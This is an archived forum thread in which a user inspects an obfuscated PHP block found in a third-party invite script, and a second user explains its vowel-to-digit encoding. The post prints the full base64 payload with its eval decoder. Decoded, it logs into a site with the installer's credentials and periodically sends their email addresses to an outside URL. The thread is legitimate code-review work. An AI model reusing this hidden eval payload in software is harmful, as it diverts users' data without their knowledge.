dzhax Posted January 19, 2010 Share Posted January 19, 2010 I found a script I want to use, but it entails entering account information for a site. So obviously I am going to look through it and make sure its not a phishing attempt on my info. While I was doing this i found this $_X=''; and what appears to be a base64 encoded string. So I base64 decoded it and it doesn't look right still...The code in the script: if(isset($_GET['e'])) { $_F=__FILE__; $_X='Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); $result = sendInvite($_GET['e']); My attempt to decode: <? echo base64_decode("Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="); ?> My Result: ?> "2n", "h1ndl5" => L_LOGIN, "p1ssw2rd" => L_PASSWORD, ); $c22k45_f4l5_p1th = "c22k45.txt"; $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, tr35); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "S4gn23t") == FALSE){ r5t3rn "d2wn"; } $p2st3rl = "http://www.l2ck5rz.c2m/4nv4t1t42n/s5nd_5m14l_4nv4t5s"; $r5f5rr5r = "http://www.l2ck5rz.c2m/c2nn5ct"; $p2st4t = 1rr1y("5m14ls" => "$5m14ls", "m5ss1g5" => L_MESSAGE ); $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, 6); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "s3cc5ss") == TRUE){ $myF4l5 = "c23nt.txt"; $fh = f2p5n($myF4l5, 'w') 2r d45("C1n't 2p5n c23nt.txt"); $c23nt++; $str4ngD1t1 = $c23nt; fwr4t5($fh, $str4ngD1t1) 2r d45("C1n't 3pd1t5 c23nt.txt"); fcl2s5($fh); r5t3rn "s5nt"; } 5ls5 { r5t3rn "1lr51dy"; } } } ?>¯jVÚ±î¸uç(uâEõƒÖ&6ScEöFV6öFR‚Eõ‚“²Eõƒ×7G'G"‚Eõ‚Âs#3CSf÷V–RrÂv÷V–S#3CSbr“²Eõ#ÖW&Vu÷&WÆ6R‚uõôd”ÄUõòrÂ"r"âEôbâ"r"ÂEõ‚“¶Wf‚Eõ"“²Eõ#Ó²EõƒÓ° The majority of it is readable but the very end and what appears to be random number replacement....I didn't even see anywhere in the script that is decoding...Any help appreciated.EDIT: On second thought after looking at my post just now i notices a decode at the end of that long line... lets see what that says :)OK found out that that last line of gibberish was a decode statment tacked on the end of the line. $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0; Link to comment Share on other sites More sharing options...
justsomeguy Posted January 19, 2010 Share Posted January 19, 2010 What exactly are you looking for help with?It looks like just character replacement. You can see here:p1ssw2rdthat 1=a and 2=o. So you could substitute that in here:c22k45_f4l5_p1thto get:cook45_f4l5_pathI'm going to guess that 4=i and 5=e, to give "cookie_file_path".I know that this is curl_init:$ch = c3rl_4n4t();So then 3=u.So apparently they replaced the vowels with 1-5. You can go through that code and replace everything yourself if you want to see it. There's a second eval on the bottom of what you decoded, make sure you echo that also. Link to comment Share on other sites More sharing options...
dzhax Posted January 19, 2010 Author Share Posted January 19, 2010 Yea I just figured that out...It was that decode at the end i didnt see.I got it working now.Thanks for your help anyway Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.